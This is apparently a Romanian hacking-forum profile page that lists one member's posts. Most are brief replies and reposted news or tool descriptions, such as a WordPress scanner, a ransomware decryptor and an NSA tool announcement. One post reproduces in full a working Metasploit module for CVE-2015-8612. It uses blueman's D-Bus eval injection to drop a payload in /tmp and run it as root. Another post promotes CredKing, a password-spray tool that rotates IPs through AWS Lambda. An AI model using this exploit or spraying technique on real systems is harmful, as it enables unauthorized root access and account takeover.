Jump to content

OKQL

Active Members
  • Content Count

    2738
  • Joined

  • Last visited

  • Days Won

    70

Everything posted by OKQL

  1. OKQL

    WPintel

    Overview WordPress Vulnerability Scanner - Scan for vulnerabilities, version, themes, plugins and much more! WPintel allows you to scan self hosted WordPress sites. With WPintel you can detect the following: • Version • Version vulnerabilities • Plugins • Themes • Users and much more! Although WPintel is designed for self hosted (wordpress.org) WordPress sites, some of it's functionalities still work for sites hosted on wordpress.com. DISCLAIMER: Usage of this extension without prior mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. Source: https://chrome.google.com/webstore/detail/wpintel/mkhmkjcbidkifopffebieonhhkondlfe
  2. Da man, asta le zic si eu, unii, ce a patit daniela cu mutu
  3. OKQL

    Ssh bruteforcer modificat putin ...

    ^ era si Sekt0r bre cyber Edit:// cu sector am baut o bere acum un an sau doi, pe cyber numai stiu nimic de el,
  4. This is without a doubt most thorough guide to detecting hidden cameras and covert spy gear that is online. The simple strategies that we are going to show you will effectively clear most rooms for hidden cameras and bugs without having to use super expensive countersurveillance gear or an outside company. Most of the processes and steps that we are going to show you are adopted from some of our best government agencies, where countersurveillance is of a grave concern to them, so these techniques have been tried and tested And the best part about this guide? Articol complet: https://www.senteltechsecurity.com/blog/post/how-to-find-hidden-cameras/
  5. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'blueman set_dhcp_handler D-Bus Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges by exploiting a Python code injection vulnerability in blueman versions prior to 2.0.3. The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the `set_dhcp_handler` function which uses user input in a call to `eval`, without sanitization, resulting in arbitrary code execution as root. This module has been tested successfully with blueman version 1.23 on Debian 8 Jessie (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'the grugq', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2015-12-18', 'References' => [ ['BID', '79688'], ['CVE', '2015-8612'], ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'], ['URL', 'https://github.com/blueman-project/blueman/issues/416'], ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'], ['URL', 'https://www.debian.org/security/2015/dsa-3427'], ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'], ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085'] ], 'Platform' => ['linux'], 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64, ARCH_PPC, ARCH_MIPSLE, ARCH_MIPSBE ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Auto', {}]], 'DefaultTarget' => 0)) register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data chmod path end def dbus_send(dest:, type:, path:, interface:, contents:) cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}" end def check unless command_exists? 'dbus-send' vprint_error 'dbus-send is not installed. Exploitation will fail.' return CheckCode::Safe end vprint_good 'dbus-send is installed' res = dbus_send( dest: 'org.blueman.Mechanism', type: 'method_call', path: '/', interface: 'org.freedesktop.DBus.Introspectable.Introspect', contents: '' ) unless res.include? 'EnableNetwork' vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available' return CheckCode::Safe end vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available' res = execute_python('') unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)' vprint_error 'Target is not vulnerable' return CheckCode::Safe end CheckCode::Vulnerable end def execute_python(code) dbus_send( dest: 'org.blueman.Mechanism', type: 'method_call', path: '/', interface: 'org.blueman.Mechanism.EnableNetwork', contents: "'string:[]' 'string:[]' 'string:#{code}'" ) end def exploit unless check == CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end payload_name = ".#{rand_text_alphanumeric 10..15}" payload_path = "#{base_dir}/#{payload_name}" upload_and_chmodx payload_path, generate_payload_exe print_status 'Executing payload...' res = execute_python "os.system(\"#{payload_path}&\")" vprint_line res unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)' fail_with Failure::NotVulnerable, 'The target is not vulnerable' end if res.include? 'SyntaxError:' fail_with Failure::Unknown, 'Payload execution failed due to syntax error' end end end # 0day.today [2019-01-17] #
  6. What is ETH2.0? ETH2.0 is the planned replacement for Ethereum. Over the next several years, ETH2.0’s designers intend to completely subsume Ethereum’s consensus system and state altogether. With such a broad scope, we can’t say precisely what ETH2.0 will or will not include. We do have a few specs, and quite a few teams working on early implementations. At this point, the ETH2.0 designers tentatively plan to include sharding, Casper, state rent, and an eWASM VM. Initial client testing is underway, and a feature-light ETH2.0 testnet is expected to launch within three months (Q1 2019). At first, ETH2.0 will source its Ether (but not its security) from the main Ethereum chain, but designers eventually plan to invert the relationship by making ETH2.0 the main chain, and Ethereum 1.X a shard chain under its management. Articol complet: https://hackernoon.com/what-to-expect-when-eths-expecting-80cb4951afcd
  7. OKQL

    CredKing

    Easily launch a password spray using AWS Lambda across multiple regions, rotating IP addresses with each request. Fully supports all AWS Lambda Regions Multi-threaded processing Generates user/password pairs Easily add new plugins Automatically creates execution role and lambdas Source: https://github.com/ustayready/CredKing/blob/master/README.md
  8. A simple file manager written in bash. It's Fucking Fast 🚀 Minimal (only requires bash and coreutils) Smooth Scrolling (using vim keybindings) Supports LS_COLORS! File Operations (copy, paste, rename, cut, etc) Instant as you type search Automatic CD on exit (see setup) Source: https://github.com/dylanaraps/fff/#
  9. OKQL

    [Cerere] Favorites post WP

    Salut, ai aici de unde selecta https://www.formget.com/wordpress-bookmark-plugins/
  10. OKQL

    Extensie video .MOV

    Incearca sa nu faci conversie online, se pierde din calitate cand faci up/down
  11. OKQL

    Problema Netflix

    Se refera ca ti-a "ciordit" (furat) cioroi parola Edit on: scan cu antivirusi
  12. OKQL

    PyLocky Decryptor

    This decryptor is intended to decrypt the files for those victims affected by the ransomware PyLocky. This decryptor is built to be executed on Windows systems only and it does require a PCAP of the outbound connection attempt to the C&C servers. This connection is seen seconds after the infection occurs and it will contain, among other info, the Initialization Vector (IV) and a password (both generated randomly at runtime) used to encrypt the files. Without this PCAP containing these values, the decryption won't be possible. The structure of the outbound connection contains an string like: PCNAME=NAME&IV=KXyiJnifKQQ%3D%0A&GC=VGA+3D&PASSWORD=CVxAfel9ojCYJ9So&CPU=Intel%28R%29+Xeon%28R%29+CPU+E5-1660+v4+%40+3.20GHz&LANG=en_US&INSERT=1&UID=XXXXXXXXXXXXXXXX&RAM=4&OSV=10.0.16299+16299&MAC=00%3A00%3A00%3A00%3A45%3A6B&OS=Microsoft+Windows+10+Pro Download: https://github.com/Cisco-Talos/pylocky_decryptor Source https://github.com/Cisco-Talos/pylocky_decryptor
  13. OKQL

    Salarii programatori 2018

    Nu te accepta, crede-ma Edit// te pun la test off-line, esti bun esti bine, esti praf get out, scuzr sunt un pic de sf. Ion
  14. AI ,mi-a spus cineva din interior
  15. OKQL

    Salarii programatori 2018

    Man, v-am mai spus, vrei sa te angajezi, nu trebuie sa intrebi de salariu, altfel esti exclus, totul depinde de capacitatile si evolutia voastra
  16. OKQL

    Un program pentru poze sterse..

    Omule, ti-am mai spus, ai buton, nu ne mai umplee de pupicei si inimioare
  17. OKQL

    key windows 8.1

    ///solved
  18. The US National Security Agency will release a free reverse engineering tool at the upcoming RSA security conference that will be held at the start of March, in San Francisco. From a report: Source
  19. ce m-au luat, mi-a sarit si firewall si tot @Nytro mai sunt cateva diagrame publice (noi) PS: aveti cupon, salvati $1.100
  20. The US considers Kaspersky Lab a threat. The company might’ve helped the FBI catch one of the NSA's biggest security risks. The alleged leaker behind one of the largest data breaches in the NSA's history might have been caught because of a Russian cybersecurity company the US government considers a national security threat. An exclusive report from Politico on Wednesday revealed that Kaspersky Lab, a Moscow-based security firm, turned over Twitter messages that Harold T. Martin III sent it in 2016. Martin, a contractor for the National Security Administration, had access to top secret documents from the agency's hacking group. He's accused of stealing a treasure trove of the NSA's hacking tools. After being leaked, those NSA exploits were used in massive hacks, including the WannaCry ransomware attack. According to a court filing from December, Martin, who used the account @HAL_99999999, reached out on Twitter asking for a meeting, writing, "shelf life, three weeks." While the court documents were redacted to obscure who received those messages, Politico reports that they were sent to researchers at Kaspersky Lab, who turned over the messages to the US government. FBI agents were able to search Martin's home in August 2016 after obtaining a warrant based on those Twitter messages, according to court documents. If convicted, Martin faces more than 10 years in prison. Kaspersky Lab declined to comment on the case. The Department of Justice did not respond to a request for comment. The cybersecurity company has had a strained relationship with the US government. Federal agencies and lawmakers have accused Kaspersky Lab of working with the Russian government. That accusation has led to multiple countries dropping Kaspersky, including the Netherlands and the UK. Kaspersky Lab has denied any ties to the Russian government, and argued that US intelligence has not provided any evidence that connected it to the Kremlin. Martin's lawyers argued that the FBI did not have a probable cause for a search warrant based on those Twitter messages. At a hearing on Tuesday, the former NSA contractor's attorneys said that the US government has not provided copies of digital evidence it seized from Martin, which it hopes to use in his defense. In a letter on Wednesday, US district judge Richard Bennett wrote that the government will need to provide those copies only if it determined that Martin opened those sensitive documents. You can read the letter here: https://www.scribd.com/document/397126554/HAL-MARTIN-FILING Via
  21. OKQL

    Proxy bypass

    In ce fel de camin? Este posibil, dar e pus cu scop. Lasa ca poti citi carti, etc Ai timp
  22. Si el cauta ip-uri "Profilul nu are ip", dar ce are?
  23. OKQL

    Keylogger Android

    Ai buton de thanks ARUBA, grasule ne tragi in jos
  24. OKQL

    ask

    // solved
×